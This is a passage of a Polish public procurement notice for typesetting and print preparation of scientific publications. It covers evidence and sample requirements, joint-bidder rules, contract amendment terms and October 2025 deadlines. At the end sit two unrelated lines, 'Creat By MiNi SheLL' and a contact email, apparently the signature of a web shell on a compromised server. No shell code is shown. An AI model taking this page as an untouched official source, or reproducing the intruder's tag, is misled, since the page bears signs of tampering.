inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy - Załącznik nr 6 do SWZ;<br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – Załącznik nr 7 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	Wykonawcy składają następujące przedmiotowe środki dowodowe w sposób określony w rozdziale X ust. 4 (podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym):<br/>a)	W celu potwierdzenia jakości oferowanych usług zgodnej z wymaganiami określonymi w SWZ Zamawiający wymaga złożenia przedmiotowych środków dowodowych w postaci minimum trzech reprezentatywnych dla swojej działalności realizacji/próbek przygotowanych do druku książek lub czasopism naukowych, rozumianych jako wynik realizacji usługi przygotowania do druku czasopisma lub książki, w której zakresie był skład, łamanie, wykonywanie rysunków, tabel, wzorów, nanoszenie poprawek po korektach językowych i technicznych, przygotowanie plików produkcyjnych do druku książek i czasopism naukowych, zawierających, oprócz tekstu podstawowego i tytułów, również wzory, tabele, wykresy, rysunki, zdjęcia, przypisy, bibliografie, przekształcanie otrzymywanych plików graficznych i dostosowywanie ich do wymogów składu i produkcji, generowanie plików do zamieszczenia w Internecie, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert. Realizacje/próbki należy złożyć w postaci plików produkcyjnych w formacie PDF. Przekazane w ten sposób przedmiotowe środki dowodowe będą podlegać ocenie pod kątem zgodności z kanonem obowiązującym dla publikacji naukowych.<br/>b)	W celu uzyskania punktów w kryterium „Jakość” wykonawcy składają przedmiotowy środek dowodowy w postaci projektu makiety wykonanego zgodnie ze wskazanymi w załączniku nr 8 do SWZ elementami oraz według wskazówek technicznych i z uwzględnieniem parametrów druku opisanych w załączniku nr 9 do SWZ, jako plik otwarty w programie InDesign oraz plik produkcyjny w formacie PDF lub w programach równoważnych kompatybilnych z tymi programami umożliwiające otworzenie i edytowanie.<br/>2)	Przedmiotowe środki dowodowe, o których mowa w pkt. 1), wykonawcy składają do upływu terminu składania ofert, w sposób określony w rozdziale X ust. 4 SWZ.<br/>3)	Niezłożenie do upływu terminu składania ofert przedmiotowych środków dowodowych, o których mowa w pkt. 1) lit. b), będzie skutkowało odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 2) lit. c) Ustawy Pzp, ponieważ stanowią treść oferty i służyć będą potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert.<br/>4)	Jeżeli Wykonawca nie złoży wymaganych w pkt. 1) lit. a) przedmiotowych środków dowodowych lub złożone środki dowodowe będą niekompletne, Zamawiający wezwie do ich uzupełnienia w wyznaczonym terminie zgodnie <br/>z art. 107 ust. 2 Ustawy Pzp.<br/>5)	Przedmiotowe środki dowodowe, o których mowa w pkt. 1) lit. b), nie podlegają uzupełnieniu zgodnie z art. 107 ust. 3 Ustawy Pzp.<br/>6)	UWAGA: Zgodnie z § 8 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, w przypadku przekazywania w postępowaniu lub konkursie dokumentu elektronicznego w formacie poddającym dane kompresji, opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Określone w rozdziale XIV ust. 2 pkt 1) lit. a) SWZ, tj. minimum trzy reprezentatywne dla swojej działalności realizacje/próbki<br/>przygotowanych do druku książek lub czasopism naukowych, rozumiane jako wynik realizacji usługi przygotowania do druku<br/>czasopisma lub książki, w której zakresie był skład, łamanie, wykonywanie rysunków, tabel, wzorów, nanoszenie poprawek<br/>po korektach językowych i technicznych, przygotowanie plików produkcyjnych do druku książek i czasopism naukowych,<br/>zawierających, oprócz tekstu podstawowego i tytułów, również wzory, tabele, wykresy, rysunki, zdjęcia, przypisy,<br/>bibliografie, przekształcanie otrzymywanych plików graficznych i dostosowywanie ich do wymogów składu i produkcji,<br/>generowanie plików do zamieszczenia w Internecie, wykonane w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4.	Wykonawca zobowiązany jest złożyć wraz z ofertą (na którą składają się: Formularz ofertowy – Załącznik nr 1 do SWZ oraz Formularz cenowy – Załącznik nr 2 do SWZ) za pośrednictwem Platformy, podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby uprawnione, na zasadach określonych w rozdziale XIV ust. 4 – 12, dokumenty wymienione w rozdziale XIV ust. 1 i 2:<br/>1) oświadczenie dotyczące spełniania warunków udziału w postępowaniu oraz przesłanek wykluczenia z postępowania<br/>(Załącznik nr 3 do SWZ);<br/>2) przedmiotowe środki dowodowe, o których mowa w rozdziale XIV ust. 2 SWZ;<br/>3) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>lub innego właściwego rejestru - w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania;<br/>/Wykonawca nie jest zobowiązany do złożenia tych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych. Wykonawca powinien wskazać dane umożliwiające dostęp do tych<br/>dokumentów/<br/>4) dowody dot. „samooczyszczenia” (jeżeli dotyczy);<br/>5) pełnomocnictwa (jeżeli dotyczy);<br/>6) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 Ustawy Pzp<br/>(jeżeli dotyczy);<br/>7) zobowiązanie podmiotu trzeciego (jeżeli dotyczy);<br/>8) zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do zawarcia umowy.<br/>2. Wykonawcy, którzy złożyli wspólną ofertę ponoszą, w razie wybrania ich oferty przez Zamawiającego, solidarną<br/>odpowiedzialność wobec Zamawiającego za wykonanie umowy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w stosunku do żadnego z Wykonawców<br/>nie zachodzą przesłanki podstaw do wykluczenia z postępowania.<br/>4. Każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oświadczenie z art. 125 ust. 1<br/>Ustawy. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy.<br/>5. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców,<br/>w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z Zamawiającym oraz do wystawiania dokumentów<br/>związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji<br/>zamówienia.<br/>6. W przypadku wykonawców wspólnie ubiegających się o zamówienie co najmniej jeden z wykonawców występujących<br/>wspólnie powinien wykazać się całością doświadczenia wskazanego w rozdziale XIII ust. 1 pkt 2) lit. a) SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany postanowień umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Zmiana umowy może nastąpić na zasadach określonych w art. 454 i 455 ustawy Pzp.<br/>3. Zmiana umowy dopuszczalna jest w zakresie i na warunkach przewidzianych poniżej:<br/>1) zmiany terminu realizacji poszczególnych zleceń z przyczyn niezawinionych przez strony,<br/>2) zmiany Wykonawcy, któremu Zamawiający udzielił zamówienia, w przypadku, gdy ma zastąpić go nowy Wykonawca, w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji dziedziczenia lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile wobec nowego wykonawcy, nie zachodzą podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian, a także nie ma na celu uniknięcia stosowania przepisów ustawy;<br/>3) Zamawiający przewiduje możliwość zmiany terminu obowiązywania umowy poprzez możliwość jej wydłużenia o maksymalnie 12 miesięcy w stosunku do terminu wskazanych w § 2 ust. 1 w przypadku wystąpienia przyczyn niezależnych od Zamawiającego lub braku wyczerpania kwoty maksymalnej umowy określonej w § 8 ust. 1;<br/>4) w zakresie sposobu realizacji umowy lub terminu realizacji umowy w przypadku zaistnienia siły wyższej.<br/>4. Zamawiający dopuszcza również możliwość zmiany wynagrodzenia umownego w czasie trwania umowy, w przypadku zmian w przepisach prawa dotyczących stawki podatku VAT, na zasadach określonych w ust. 5-7, jeżeli zmiana ta będzie miały wpływ na koszty wykonania umowy przez Wykonawcę.<br/>5. Zamawiający, w przypadku gdy czas trwania umowy przekroczy okres 12 miesięcy, przewiduje możliwość zmiany cen jednostkowych określonych w formularzu cenowym, a przez to wysokości wynagrodzenia Wykonawcy, o którym mowa w § 8 ust. 1, w formie pisemnego aneksu, w przypadku wystąpienia co najmniej jednej z następujących okoliczności:<br/>1) zmiana wysokości stawki podatku od towarów i usług;<br/>2) zmiana wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2020 r. poz. 2207.);<br/>3) zmiana zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2020 r. poz. 1342, z późn. zm.)<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę.<br/>6. W celu uzyskania zgody drugiej Strony i zawarcia aneksu, na podstawie ust. 5, każda ze Stron może wystąpić do drugiej Strony w terminie 30 dni od dnia wejścia w życie zmian w powyższym zakresie, wraz z uzasadnieniem, w którym odpowiednio Zamawiający wykaże wpływ zmian na zmniejszenie kosztów wykonywania umowy przez Wykonawcę, co powinno skutkować zmniejszeniem cen jednostkowych i wysokości wynagrodzenia Wykonawcy, albo Wykonawca wykaże wpływ zmian na zwiększenie kosztów wykonywania umowy, co powinno skutkować zwiększeniem wysokości cen jednostkowych i wynagrodzenia Wykonawcy, o którym mowa w § 8 ust. 1 umowy.<br/>7. Aneks, o którym mowa w ust. 5 będzie obowiązywał od dnia jego zawarcia ze skutkiem od dnia wejścia w życie zmian przepisów będących podstawą do zmiany wysokości wynagrodzenia Wykonawcy, o których mowa w ust. 5 albo od dnia zawnioskowanego przez Stronę, jeżeli będzie to termin późniejszy.<br/>8. W przypadku zmiany cen materiałów/kosztów związanych z realizacją przedmiotu Umowy, możliwa jest zmiana wysokości cen jednostkowych i wynagrodzenia, o którym mowa w § 8 ust. 1 Umowy, na zasadach określonych w ust. 9 – 14.<br/>9. Ze względu na ograniczoną liczbę znaków szczegółowe uregulowania zawarte zostały w § 12 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-23 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy dostępnej pod adresem: https://sgh.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-23 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com